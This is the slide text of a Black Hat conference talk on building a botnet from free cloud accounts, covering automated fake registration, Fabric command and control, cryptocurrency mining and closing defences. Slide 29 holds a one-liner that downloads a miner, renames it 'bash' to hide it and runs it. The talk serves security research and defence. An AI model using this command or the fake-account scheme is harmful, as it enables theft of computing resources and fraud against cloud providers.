SlideShare a Scribd company logo

Black Hat USA - CloudBots Harvesting Crypto Coins Like a Botnet Farmer

Bishop Fox
Bishop Fox

What happens when computer criminals start using friendly cloud services such as Dropbox, Google Apps, Heroku, Amazon EC2 and Yahoo Pipes for malicious activities? This presentation will explore how to (ab)use the free public cloud for the business of computer crime. Oh! Also we violate the hell out of some terms of service.

Software
1 of 45
Download to read offline
CloudBots: Harvesting Crypto Coins Like a Botnet Farmer 2014 August 6
2 Main Topics • Could we build a botnet from freely available cloud services? • Will we see the rise of more cloud based botnets? • Should insufficient anti-automation be considered a top ten vulnerability? What are these guys talking about? Overview
3 Platform as a Service Cloud PaaS
4 Platform as a Service Free Cloud Services <Insert with other providers later> Reference: http://goo.gl/AZ4nYp
5 Development Environment as a Service Free Cloud Services
AUTOMATION Scripting the Cloud
7 Automating Registration • Hurdles - Email address confirmation - CAPTCHA - Phone/SMS - Credit Card Usability vs Security Cloud Providers (In)Security
8 Anti-Automation Fraudulent Account Registration More Anti-Automation Email Confirmation Only 66% 33% EMAIL CAPTCHA CREDIT CARD PHONE
9 Anti-Automation Techniques • Email address confirmation • CAPTCHA • Phone/SMS • Credit Card Usability vs Security Cloud Providers (In)Security
10 Automated email processing - Wildcard localpart *@domain.com - Extract important information from incoming emails - Grep for confirmation token links and request them Account registration - Automatic request sent to account activation links SMTP Services Email Confirmation Token Processing
local-part@domain.tld Email Address Anatomy
12 Using the Google AppEngine InboundMailHandler - first.last.001@cloudbotmail.appspotmail.com - first.last.002@cloudbotmail.appspotmail.com - first.last.003@cloudbotmail.appspotmail.com - first.last.004@cloudbotmail.appspotmail.com - first.last.005@cloudbotmail.appspotmail.com - first.last.006@cloudbotmail.appspotmail.com - first.last.007@cloudbotmail.appspotmail.com - first.last.008@cloudbotmail.appspotmail.com - first.last.009@cloudbotmail.appspotmail.com - first.last.010@cloudbotmail.appspotmail.com Google App Engine Detection issues
13 Unlimited usernames - Prevent pattern recognition - Pull from real world examples [local-part from dump]@domain.tld Realistic Randomness Real Email Addresses
14 Unlimited domains - freedns.afraid.org - Prevent detection - Thousands of unique email domains SMTP Services Plethora of Email Addresses
15 Unlimited email addresses Free DNS Subdomains
16 What do we need? • Free email relay - Free MX registration • Process wildcards - *@domain.tld • Send unlimited messages - Unrestricted STMP to HTTP POST/JSON requests Free Signups Receiving Email and Processing
17 Inbound Mail As A Service Free Cloud Services <Insert with other providers later> Reference: http://goo.gl/yqoh6U
18 Automated email processing - Extract important information from incoming emails - Grep for confirmation token links and request them Account registration - Automatic request sent to account activation links SMTP Services Email Confirmation Token Processing Reference: http://bishopfox.github.io/anti-anti-automation/
19 <Insert wall of random email addresses> Realistic Randomness Unique Email Addresses Avoid Pattern Recognition
DEMONSTRATION Automatic Account Creation
21 Automated Registration Workflow Email Addresses
22 MongoDB • MongoLab • MongoHQ Keeping track of all accounts Storing Account Information
FUNTIVITIES Botnets Are Fun!
24 What can we do? • Distributed Network Scanning • Distributed Password Cracking • DDoS • Click-fraud • Crypto Currency Mining • Data Storage Now we have a botnet! Fun! Botnet Activities
25 Refer Fake Friends Unlimited Storage Space
26 Refer Fake Friends Unlimited Storage Space
27 What are we using? • Fabric - Fabric is a Python library and command- line tool for streamlining the use of SSH for application deployment or systems administration tasks. • fab check_hosts –P –z 20 • fab run_command Botnet C2 Command & Control
28 Unique Amazon IP Addresses Distributed Command [na1.cloudbox.net:2352]: curl http://icanhazip.com 4.109.182.13 [eu1.cloudbox.net:3127]: curl http://icanhazip.com 126.34.56.254 [na1.cloudbox.net:10660]: curl http://icanhazip.com 58.251.42.128 [na1.cloudbox.net:15627]: curl http://icanhazip.com 74.216.236.72 [na1.cloudbox.net:8000]: curl http://icanhazip.com 28.228.253.19 [na1.cloudbox.net:4028]: curl http://icanhazip.com 64.216.37.252
29 Make money, money • Deploying miners • One command for $$$ All your processors are belong to us Litecoin Mining if [ ! -f bash ]; then wget http://sourceforge.net/projects/cpuminer/files/pooler-cpuminer- 2.3.2-linux-x86_64.tar.gz && tar zxfv pooler-cpuminer-2.3.2- linux-x86_64.tar.gz && rm pooler-cpuminer-2.3.2-linux- x86_64.tar.gz && mv minerd bash; fi; screen ./bash – url=stratum+tcp://pool.mine-litecoin.com --userpass=ninja.47:47; rm bash
30 Load After Crypto Currency Mining Distributed Command ID | Host | Status ---------------------------------------- 0 | na1.cloudbox.net:1678 | 2 users, load average: 37.08, 37.60, 32.51 1 | na1.cloudbox.net:15121| 1 user, load average: 16.35, 15.35, 12.00 2 | na1.cloudbox.net:11631| 1 user, load average: 19.65, 18.46, 14.38 3 | na1.cloudbox.net:4358 | 2 users, load average: 23.10, 22.91, 18.95 4 | na1.cloudbox.net:1212 | 1 user, load average: 19.60, 18.47, 14.41 5 | na1.cloudbox.net:5841 | 1 user, load average: 19.97, 18.61, 14.52 6 | eu1.cloudbox.net:3025 | 1 user, load average: 19.27, 18.37, 14.33 7 | eu1.cloudbox.net:6892 | 2 users, load average: 19.65, 18.46, 14.38 8 | eu1.cloudbox.net:2038 | 1 user, load average: 18.85, 17.43, 13.45 9 | na1.cloudbox.net:5235 | 1 user, load average: 18.55, 17.32, 13.38 10 | na1.cloudbox.net:1122 | 1 user, load average: 26.04, 25.57, 20.02
31 All your processors are belong to us Litecoin Mining
CLOUD BREAKOUT Bypassing Restrictions
DETECTION No one can catch a ninja!
34 Automatic Backups • Propagate to other similar services - e.g. MongoLab   MongoHQ • Infrastructure across multiple service providers • Easily migrated Armadillo Up ™ Disaster Recovery Plan
RISING TREND Active Attacks
36 Adaptation Cloud Provider Registration
37 Adaptation Cloud Provider Registration
38 Adaptation Cloud Provider Registration
39 Crypto Coins & DDoS Clouds Under Siege
40 Crypto Coins & DDoS Clouds Under Siege
PROTECTION Bot Busters
42 What can we do? • Logic puzzles • Sound output • Credit card validation • Live operators • Limited-use account • Heuristic checks • Federated identity systems Usability vs Security Protection Reference: http://www.w3.org/TR/2003/WD-turingtest-20031105/#solutions
43 What should we do? • Analyzing properties of Sybil accounts • Analyzing the arrival rate and distribution of accounts • Flag accounts registered with emails from newly registered domain names • Email verification • CAPTCHAs • IP Blacklisting • Phone/SMS verification • Automatic pattern recognition At Abuse vs At Registration Protection Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
44 At Abuse vs At Registration Protection Advanced techniques • Signup flow events - Detect common activities after signup • User-agent - A registration bot may generate a different user-agent for each signup or use uncommon user-agents • Form submission timing - A bot that doesn't mimic human behavior by performing certain actions too quickly can be detected Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
THANK YOU Oscar Salazar @tracertea Rob Ragan @sweepthatleg CONTACT@BISHOPFOX.COM

Recommended

From Zero to Serverless
From Zero to ServerlessFrom Zero to Serverless
From Zero to Serverless
Chad Green
 
NGINX Microservices Reference Architecture: Ask Me Anything
NGINX Microservices Reference Architecture: Ask Me AnythingNGINX Microservices Reference Architecture: Ask Me Anything
NGINX Microservices Reference Architecture: Ask Me Anything
NGINX, Inc.
 
Azure IoT Hub: what is it and why we select other solution (production projec...
Azure IoT Hub: what is it and why we select other solution (production projec...Azure IoT Hub: what is it and why we select other solution (production projec...
Azure IoT Hub: what is it and why we select other solution (production projec...
Katherine Golovinova
 
CloudBots - Harvesting Crypto Currency Like a Botnet Farmer
CloudBots - Harvesting Crypto Currency Like a Botnet FarmerCloudBots - Harvesting Crypto Currency Like a Botnet Farmer
CloudBots - Harvesting Crypto Currency Like a Botnet Farmer
Rob Ragan
 
How to build corporate size fraud prevention
How to build corporate size fraud preventionHow to build corporate size fraud prevention
How to build corporate size fraud prevention
Rakuten Group, Inc.
 
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud ThreatsBeyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
SBWebinars
 
Boundless Digital - Boost IT Network Capabilities thanks to Cisco APIs
Boundless Digital - Boost IT Network Capabilities thanks to Cisco APIsBoundless Digital - Boost IT Network Capabilities thanks to Cisco APIs
Boundless Digital - Boost IT Network Capabilities thanks to Cisco APIs
Sidney Burks, Ph.D
 
Meetup milano #3 all you need to know before creating your vpc
Meetup milano #3 all you need to know before creating your vpcMeetup milano #3 all you need to know before creating your vpc
Meetup milano #3 all you need to know before creating your vpc
Gonzalo Marcos Ansoain
 

Recommended

From Zero to Serverless
From Zero to ServerlessFrom Zero to Serverless
From Zero to Serverless
Chad Green
 
NGINX Microservices Reference Architecture: Ask Me Anything
NGINX Microservices Reference Architecture: Ask Me AnythingNGINX Microservices Reference Architecture: Ask Me Anything
NGINX Microservices Reference Architecture: Ask Me Anything
NGINX, Inc.
 
Azure IoT Hub: what is it and why we select other solution (production projec...
Azure IoT Hub: what is it and why we select other solution (production projec...Azure IoT Hub: what is it and why we select other solution (production projec...
Azure IoT Hub: what is it and why we select other solution (production projec...
Katherine Golovinova
 
CloudBots - Harvesting Crypto Currency Like a Botnet Farmer
CloudBots - Harvesting Crypto Currency Like a Botnet FarmerCloudBots - Harvesting Crypto Currency Like a Botnet Farmer
CloudBots - Harvesting Crypto Currency Like a Botnet Farmer
Rob Ragan
 
How to build corporate size fraud prevention
How to build corporate size fraud preventionHow to build corporate size fraud prevention
How to build corporate size fraud prevention
Rakuten Group, Inc.
 
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud ThreatsBeyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
SBWebinars
 
Boundless Digital - Boost IT Network Capabilities thanks to Cisco APIs
Boundless Digital - Boost IT Network Capabilities thanks to Cisco APIsBoundless Digital - Boost IT Network Capabilities thanks to Cisco APIs
Boundless Digital - Boost IT Network Capabilities thanks to Cisco APIs
Sidney Burks, Ph.D
 
Meetup milano #3 all you need to know before creating your vpc
Meetup milano #3 all you need to know before creating your vpcMeetup milano #3 all you need to know before creating your vpc
Meetup milano #3 all you need to know before creating your vpc
Gonzalo Marcos Ansoain
 
[Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발
[Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발 [Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발
[Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발
Yunho Maeng
 
VPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys Meetups
VPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys MeetupsVPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys Meetups
VPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys Meetups
Angel Alberici
 
How to build corporate size fraud prevention
How to build corporate size fraud preventionHow to build corporate size fraud prevention
How to build corporate size fraud prevention
Yury Leonychev
 
Pedro Fortuna - Protecting Crypto Exchanges From a New Wave of Man-in-the-Bro...
Pedro Fortuna - Protecting Crypto Exchanges From a New Wave of Man-in-the-Bro...Pedro Fortuna - Protecting Crypto Exchanges From a New Wave of Man-in-the-Bro...
Pedro Fortuna - Protecting Crypto Exchanges From a New Wave of Man-in-the-Bro...
Hacken_Ecosystem
 
Getting started with bc 2.0 in the cloud
Getting started with bc 2.0 in the cloud Getting started with bc 2.0 in the cloud
Getting started with bc 2.0 in the cloud
LennartF
 
IoT with the Best: Watson IoT Bluemix and Blockchain
IoT with the Best: Watson IoT Bluemix and BlockchainIoT with the Best: Watson IoT Bluemix and Blockchain
IoT with the Best: Watson IoT Bluemix and Blockchain
Valerie Lampkin
 
IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...
IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...
IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...
WithTheBest
 
Achieving scalability & speed with IaaS
Achieving scalability & speed with IaaSAchieving scalability & speed with IaaS
Achieving scalability & speed with IaaS
IBM Software India
 
Will Microservices Die.pdf
Will Microservices Die.pdfWill Microservices Die.pdf
Will Microservices Die.pdf
RichHagarty
 
IBM API Connect Deployment `Good Practices - IBM Think 2018
IBM API Connect Deployment `Good Practices - IBM Think 2018IBM API Connect Deployment `Good Practices - IBM Think 2018
IBM API Connect Deployment `Good Practices - IBM Think 2018
Chris Phillips
 
Using IBM Blockchain Platform (November 2019)
Using IBM Blockchain Platform (November 2019)Using IBM Blockchain Platform (November 2019)
Using IBM Blockchain Platform (November 2019)
Matt Lucas
 
Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...
Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...
Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...
NoNameCon
 
A long way from Monolith to Service Isolated Architecture #MM19NL
A long way from Monolith to Service Isolated Architecture #MM19NLA long way from Monolith to Service Isolated Architecture #MM19NL
A long way from Monolith to Service Isolated Architecture #MM19NL
Igor Miniailo
 
Blockchain with HyperLedger (Public version)
Blockchain with HyperLedger (Public version)Blockchain with HyperLedger (Public version)
Blockchain with HyperLedger (Public version)
Benjamin Fuentes
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CanSecWest
 
Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203
Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203
Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203
Arnaud Le Hors
 
Integration with Dynamics CRM
Integration with Dynamics CRMIntegration with Dynamics CRM
Integration with Dynamics CRM
BizTalk360
 
Logstash and Maxmind: not just for GEOIP anymore
Logstash and Maxmind: not just for GEOIP anymoreLogstash and Maxmind: not just for GEOIP anymore
Logstash and Maxmind: not just for GEOIP anymore
FaithWestdorp
 
Cloud Computing v.s. Cyber Security
Cloud Computing v.s. Cyber Security Cloud Computing v.s. Cyber Security
Cloud Computing v.s. Cyber Security
Bahtiyar Bircan
 
Ibm blockchain - Hyperledger 15.02.18
Ibm blockchain - Hyperledger 15.02.18Ibm blockchain - Hyperledger 15.02.18
Ibm blockchain - Hyperledger 15.02.18
TelecomValley
 
OWASP LA – SharePoint Hacking – 22Feb2012 – Slides.PDF
OWASP LA – SharePoint Hacking – 22Feb2012 – Slides.PDFOWASP LA – SharePoint Hacking – 22Feb2012 – Slides.PDF
OWASP LA – SharePoint Hacking – 22Feb2012 – Slides.PDF
Bishop Fox
 
InfoSec World 2016 – RFIDiggity – Pentester Guide to Hacking HF/NFC and UHF...
InfoSec World 2016 – RFIDiggity – Pentester Guide to Hacking HF/NFC and UHF... InfoSec World 2016 – RFIDiggity – Pentester Guide to Hacking HF/NFC and UHF...
InfoSec World 2016 – RFIDiggity – Pentester Guide to Hacking HF/NFC and UHF...
Bishop Fox
 

More Related Content

Similar to Black Hat USA - CloudBots Harvesting Crypto Coins Like a Botnet Farmer

[Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발
[Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발 [Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발
[Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발
Yunho Maeng
 
VPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys Meetups
VPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys MeetupsVPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys Meetups
VPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys Meetups
Angel Alberici
 
How to build corporate size fraud prevention
How to build corporate size fraud preventionHow to build corporate size fraud prevention
How to build corporate size fraud prevention
Yury Leonychev
 
Pedro Fortuna - Protecting Crypto Exchanges From a New Wave of Man-in-the-Bro...
Pedro Fortuna - Protecting Crypto Exchanges From a New Wave of Man-in-the-Bro...Pedro Fortuna - Protecting Crypto Exchanges From a New Wave of Man-in-the-Bro...
Pedro Fortuna - Protecting Crypto Exchanges From a New Wave of Man-in-the-Bro...
Hacken_Ecosystem
 
Getting started with bc 2.0 in the cloud
Getting started with bc 2.0 in the cloud Getting started with bc 2.0 in the cloud
Getting started with bc 2.0 in the cloud
LennartF
 
IoT with the Best: Watson IoT Bluemix and Blockchain
IoT with the Best: Watson IoT Bluemix and BlockchainIoT with the Best: Watson IoT Bluemix and Blockchain
IoT with the Best: Watson IoT Bluemix and Blockchain
Valerie Lampkin
 
IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...
IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...
IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...
WithTheBest
 
Achieving scalability & speed with IaaS
Achieving scalability & speed with IaaSAchieving scalability & speed with IaaS
Achieving scalability & speed with IaaS
IBM Software India
 
Will Microservices Die.pdf
Will Microservices Die.pdfWill Microservices Die.pdf
Will Microservices Die.pdf
RichHagarty
 
IBM API Connect Deployment `Good Practices - IBM Think 2018
IBM API Connect Deployment `Good Practices - IBM Think 2018IBM API Connect Deployment `Good Practices - IBM Think 2018
IBM API Connect Deployment `Good Practices - IBM Think 2018
Chris Phillips
 
Using IBM Blockchain Platform (November 2019)
Using IBM Blockchain Platform (November 2019)Using IBM Blockchain Platform (November 2019)
Using IBM Blockchain Platform (November 2019)
Matt Lucas
 
Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...
Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...
Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...
NoNameCon
 
A long way from Monolith to Service Isolated Architecture #MM19NL
A long way from Monolith to Service Isolated Architecture #MM19NLA long way from Monolith to Service Isolated Architecture #MM19NL
A long way from Monolith to Service Isolated Architecture #MM19NL
Igor Miniailo
 
Blockchain with HyperLedger (Public version)
Blockchain with HyperLedger (Public version)Blockchain with HyperLedger (Public version)
Blockchain with HyperLedger (Public version)
Benjamin Fuentes
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CanSecWest
 
Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203
Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203
Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203
Arnaud Le Hors
 
Integration with Dynamics CRM
Integration with Dynamics CRMIntegration with Dynamics CRM
Integration with Dynamics CRM
BizTalk360
 
Logstash and Maxmind: not just for GEOIP anymore
Logstash and Maxmind: not just for GEOIP anymoreLogstash and Maxmind: not just for GEOIP anymore
Logstash and Maxmind: not just for GEOIP anymore
FaithWestdorp
 
Cloud Computing v.s. Cyber Security
Cloud Computing v.s. Cyber Security Cloud Computing v.s. Cyber Security
Cloud Computing v.s. Cyber Security
Bahtiyar Bircan
 
Ibm blockchain - Hyperledger 15.02.18
Ibm blockchain - Hyperledger 15.02.18Ibm blockchain - Hyperledger 15.02.18
Ibm blockchain - Hyperledger 15.02.18
TelecomValley
 

Similar to Black Hat USA - CloudBots Harvesting Crypto Coins Like a Botnet Farmer (20)

[Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발
[Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발 [Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발
[Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발
 
VPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys Meetups
VPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys MeetupsVPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys Meetups
VPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys Meetups
 
How to build corporate size fraud prevention
How to build corporate size fraud preventionHow to build corporate size fraud prevention
How to build corporate size fraud prevention
 
Pedro Fortuna - Protecting Crypto Exchanges From a New Wave of Man-in-the-Bro...
Pedro Fortuna - Protecting Crypto Exchanges From a New Wave of Man-in-the-Bro...Pedro Fortuna - Protecting Crypto Exchanges From a New Wave of Man-in-the-Bro...
Pedro Fortuna - Protecting Crypto Exchanges From a New Wave of Man-in-the-Bro...
 
Getting started with bc 2.0 in the cloud
Getting started with bc 2.0 in the cloud Getting started with bc 2.0 in the cloud
Getting started with bc 2.0 in the cloud
 
IoT with the Best: Watson IoT Bluemix and Blockchain
IoT with the Best: Watson IoT Bluemix and BlockchainIoT with the Best: Watson IoT Bluemix and Blockchain
IoT with the Best: Watson IoT Bluemix and Blockchain
 
IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...
IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...
IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...
 
Achieving scalability & speed with IaaS
Achieving scalability & speed with IaaSAchieving scalability & speed with IaaS
Achieving scalability & speed with IaaS
 
Will Microservices Die.pdf
Will Microservices Die.pdfWill Microservices Die.pdf
Will Microservices Die.pdf
 
IBM API Connect Deployment `Good Practices - IBM Think 2018
IBM API Connect Deployment `Good Practices - IBM Think 2018IBM API Connect Deployment `Good Practices - IBM Think 2018
IBM API Connect Deployment `Good Practices - IBM Think 2018
 
Using IBM Blockchain Platform (November 2019)
Using IBM Blockchain Platform (November 2019)Using IBM Blockchain Platform (November 2019)
Using IBM Blockchain Platform (November 2019)
 
Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...
Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...
Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ...
 
A long way from Monolith to Service Isolated Architecture #MM19NL
A long way from Monolith to Service Isolated Architecture #MM19NLA long way from Monolith to Service Isolated Architecture #MM19NL
A long way from Monolith to Service Isolated Architecture #MM19NL
 
Blockchain with HyperLedger (Public version)
Blockchain with HyperLedger (Public version)Blockchain with HyperLedger (Public version)
Blockchain with HyperLedger (Public version)
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
 
Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203
Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203
Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203
 
Integration with Dynamics CRM
Integration with Dynamics CRMIntegration with Dynamics CRM
Integration with Dynamics CRM
 
Logstash and Maxmind: not just for GEOIP anymore
Logstash and Maxmind: not just for GEOIP anymoreLogstash and Maxmind: not just for GEOIP anymore
Logstash and Maxmind: not just for GEOIP anymore
 
Cloud Computing v.s. Cyber Security
Cloud Computing v.s. Cyber Security Cloud Computing v.s. Cyber Security
Cloud Computing v.s. Cyber Security
 
Ibm blockchain - Hyperledger 15.02.18
Ibm blockchain - Hyperledger 15.02.18Ibm blockchain - Hyperledger 15.02.18
Ibm blockchain - Hyperledger 15.02.18
 

More from Bishop Fox

OWASP LA – SharePoint Hacking – 22Feb2012 – Slides.PDF
OWASP LA – SharePoint Hacking – 22Feb2012 – Slides.PDFOWASP LA – SharePoint Hacking – 22Feb2012 – Slides.PDF
OWASP LA – SharePoint Hacking – 22Feb2012 – Slides.PDF
Bishop Fox
 
InfoSec World 2016 – RFIDiggity – Pentester Guide to Hacking HF/NFC and UHF...
InfoSec World 2016 – RFIDiggity – Pentester Guide to Hacking HF/NFC and UHF... InfoSec World 2016 – RFIDiggity – Pentester Guide to Hacking HF/NFC and UHF...
InfoSec World 2016 – RFIDiggity – Pentester Guide to Hacking HF/NFC and UHF...
Bishop Fox
 
InfoSec World 2013 – W4 – Using Google to Find Vulnerabilities in Your IT Env...
InfoSec World 2013 – W4 – Using Google to Find Vulnerabilities in Your IT Env...InfoSec World 2013 – W4 – Using Google to Find Vulnerabilities in Your IT Env...
InfoSec World 2013 – W4 – Using Google to Find Vulnerabilities in Your IT Env...
Bishop Fox
 
DEFCON 20 (2012) – Tenacious Diggity – 29July2012 – Slides.PDF
DEFCON 20 (2012) – Tenacious Diggity – 29July2012 – Slides.PDFDEFCON 20 (2012) – Tenacious Diggity – 29July2012 – Slides.PDF
DEFCON 20 (2012) – Tenacious Diggity – 29July2012 – Slides.PDF
Bishop Fox
 
SpellCheckV2 Rules
SpellCheckV2 RulesSpellCheckV2 Rules
SpellCheckV2 Rules
Bishop Fox
 
Smarter Home Invasion With ZigDiggity
Smarter Home Invasion With ZigDiggitySmarter Home Invasion With ZigDiggity
Smarter Home Invasion With ZigDiggity
Bishop Fox
 
Hacking Exposed EBS Volumes
Hacking Exposed EBS Volumes Hacking Exposed EBS Volumes
Hacking Exposed EBS Volumes
Bishop Fox
 
Ghost in the Browser: Broad-Scale Espionage with Bitsquatting
Ghost in the Browser: Broad-Scale Espionage with Bitsquatting Ghost in the Browser: Broad-Scale Espionage with Bitsquatting
Ghost in the Browser: Broad-Scale Espionage with Bitsquatting
Bishop Fox
 
Ferris Bueller’s Guide to Abuse Domain Permutations
Ferris Bueller’s Guide to Abuse Domain PermutationsFerris Bueller’s Guide to Abuse Domain Permutations
Ferris Bueller’s Guide to Abuse Domain Permutations
Bishop Fox
 
Check Your Privilege (Escalation)
Check Your Privilege (Escalation) Check Your Privilege (Escalation)
Check Your Privilege (Escalation)
Bishop Fox
 
Introduction to Linux Privilege Escalation Methods
Introduction to Linux Privilege Escalation MethodsIntroduction to Linux Privilege Escalation Methods
Introduction to Linux Privilege Escalation Methods
Bishop Fox
 
Penetration Testing Resource Guide
Penetration Testing Resource Guide Penetration Testing Resource Guide
Penetration Testing Resource Guide
Bishop Fox
 
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsNetwork Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Bishop Fox
 
How Perceptual Analysis Helps Bug Hunters
How Perceptual Analysis Helps Bug HuntersHow Perceptual Analysis Helps Bug Hunters
How Perceptual Analysis Helps Bug Hunters
Bishop Fox
 
Getting Buzzed on Buzzwords: Using Cloud & Big Data to Pentest at Scale
Getting Buzzed on Buzzwords: Using Cloud & Big Data to Pentest at ScaleGetting Buzzed on Buzzwords: Using Cloud & Big Data to Pentest at Scale
Getting Buzzed on Buzzwords: Using Cloud & Big Data to Pentest at Scale
Bishop Fox
 
Evolving Cyber Adversary Simulation: How Red Teaming Benefits Organizations
Evolving Cyber Adversary Simulation: How Red Teaming Benefits OrganizationsEvolving Cyber Adversary Simulation: How Red Teaming Benefits Organizations
Evolving Cyber Adversary Simulation: How Red Teaming Benefits Organizations
Bishop Fox
 
ASU Cybersecurity Symposium - Breaking Into a Career of Breaking In
ASU Cybersecurity Symposium - Breaking Into a Career of Breaking In ASU Cybersecurity Symposium - Breaking Into a Career of Breaking In
ASU Cybersecurity Symposium - Breaking Into a Career of Breaking In
Bishop Fox
 
CactusCon 2018 - Anatomy of an AppSec Program
CactusCon 2018 - Anatomy of an AppSec Program CactusCon 2018 - Anatomy of an AppSec Program
CactusCon 2018 - Anatomy of an AppSec Program
Bishop Fox
 
Preparing a Next Generation IT Strategy
Preparing a Next Generation IT StrategyPreparing a Next Generation IT Strategy
Preparing a Next Generation IT Strategy
Bishop Fox
 
Lord of the Bing: Taking Back Search Engine Hacking From Google and Bing
Lord of the Bing: Taking Back Search Engine Hacking From Google and BingLord of the Bing: Taking Back Search Engine Hacking From Google and Bing
Lord of the Bing: Taking Back Search Engine Hacking From Google and Bing
Bishop Fox
 

More from Bishop Fox (20)

OWASP LA – SharePoint Hacking – 22Feb2012 – Slides.PDF
OWASP LA – SharePoint Hacking – 22Feb2012 – Slides.PDFOWASP LA – SharePoint Hacking – 22Feb2012 – Slides.PDF
OWASP LA – SharePoint Hacking – 22Feb2012 – Slides.PDF
 
